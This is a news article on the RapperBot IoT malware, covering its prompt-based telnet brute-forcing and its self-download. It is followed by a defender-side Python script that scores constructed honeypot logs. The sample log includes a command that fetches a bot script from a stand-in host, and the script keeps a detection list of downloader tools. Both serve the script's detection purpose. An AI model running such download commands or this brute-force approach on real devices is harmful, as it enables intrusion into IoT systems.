A new version of a Mirai variant called RapperBot is the latest example of malware using relatively uncommon or previously unknown infection vectors to try to spread widely. RapperBot first surfaced last year as Internet of Things (IoT) malware containing large chunks of Mirai source code but with some substantially different functionality compared with other Mirai variants. The differences included the use of a new protocol for command-and-control (C2) communications and a built-in feature for brute-forcing SSH servers rather than Telnet services, as is common in Mirai variants.

Constantly Evolving Threat
Researchers from Fortinet tracking the malware last year observed its authors regularly altering the malware, first by adding code to maintain persistence on infected machines even after a reboot, and then with code for self-propagation via a remote binary downloader. Later, the malware authors removed the self-propagation feature and added one that allowed them persistent remote access to brute-forced SSH servers.

In the fourth quarter of 2022, Kaspersky’s researchers discovered a new RapperBot variant circulating in the wild, where the SSH brute-force functionality had been removed and replaced with capabilities for targeting telnet servers. Kaspersky’s analysis of the malware showed it also integrated what the security vendor described as an “intelligent” and somewhat uncommon feature for brute-forcing telnet. Rather than brute-forcing with a huge set of credentials, the malware checks the prompts received when it telnets to a device — and based on that, selects the appropriate set of credentials for a brute-force attack. That significantly speeds up the brute-forcing process compared with many other malware tools, Kaspersky said.

“When you telnet to a device, you typically get a prompt,” says Jornt van der Wiel, a senior security researcher at Kaspersky. The prompt can reveal some information that RapperBot uses to determine the device it’s targeting and which credentials to use, he says. Depending on the IoT device that is targeted, RapperBot uses different credentials, he says. “So, for device A, it uses user/password set A; and for device B, it uses user/password set B,” van der Wiel says.

The malware then uses a variety of possible commands, such as “wget,” “curl,” and “ftpget” to download itself on the target system. If these methods don’t work, the malware uses a downloader and installs itself on the device, according to Kaspersky.
RapperBot’s brute-force process is relatively uncommon, and van der Wiel says he can’t name other malware samples that use the approach. Even so, given the sheer number of malware samples in the wild, it’s impossible to say if it is the only malware currently using this approach. It’s likely not the first piece of malicious code to use the technique, he says.
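A defender-side illustration of the behaviour chain described above (a prompt-driven, small credential set followed by a wget/curl/ftpget self-download), as an added example that is not from the article, Fortinet or Kaspersky: it scores constructed telnet honeypot session logs and separates the tailored pattern from an ordinary credential spray. The log format, field names and the three-attempt threshold are assumptions.

```python
import re
from collections import defaultdict

DOWNLOADERS = ("wget", "curl", "ftpget", "tftp")
TAILORED_MAX_ATTEMPTS = 3  # assumed threshold: a prompt-tailored list needs few tries

# Constructed honeypot session log (not real telemetry). Fields: ts src event detail
SAMPLE_LOG = """\
10:00:01 198.51.100.7 prompt RouterX login:
10:00:02 198.51.100.7 login admin:admin FAIL
10:00:02 198.51.100.7 login user1:pass1 OK
10:00:03 198.51.100.7 cmd wget http://198.51.100.9/bot.sh
10:00:04 203.0.113.5 prompt login:
10:00:05 203.0.113.5 login root:root FAIL
10:00:05 203.0.113.5 login root:1234 FAIL
10:00:06 203.0.113.5 login admin:admin FAIL
10:00:06 203.0.113.5 login admin:1234 FAIL
10:00:07 203.0.113.5 login user:user FAIL
10:00:08 192.0.2.10 prompt login:
10:00:09 192.0.2.10 login user1:pass1 OK
10:00:10 192.0.2.10 cmd uptime
"""

LINE_RE = re.compile(r"^(\S+) (\S+) (prompt|login|cmd) (.*)$")


def parse_log(text):
    """Return (src, event, detail) tuples; malformed lines are skipped."""
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if m:
            events.append((m.group(2), m.group(3), m.group(4)))
    return events


def classify_sessions(events):
    """Summarise each source and label RapperBot-like behaviour."""
    sessions = defaultdict(lambda: {"prompt": "", "attempts": 0, "success": False, "download": False})
    for src, event, detail in events:
        s = sessions[src]
        if event == "prompt":
            s["prompt"] = detail  # the banner the attacker saw before choosing credentials
        elif event == "login":
            s["attempts"] += 1
            s["success"] = s["success"] or detail.endswith(" OK")
        elif event == "cmd" and s["success"]:
            s["download"] = s["download"] or detail.split()[0] in DOWNLOADERS
    for s in sessions.values():
        if s["success"] and s["attempts"] <= TAILORED_MAX_ATTEMPTS and s["download"]:
            s["verdict"] = "tailored-bruteforce-then-download"  # the pattern described above
        elif s["attempts"] > TAILORED_MAX_ATTEMPTS and not s["success"]:
            s["verdict"] = "credential-spray"
        else:
            s["verdict"] = "benign-or-unknown"
    return dict(sessions)
```

The distinguishing signal is a successful login within a handful of tries followed immediately by a download command, which a simple failed-attempt counter would miss.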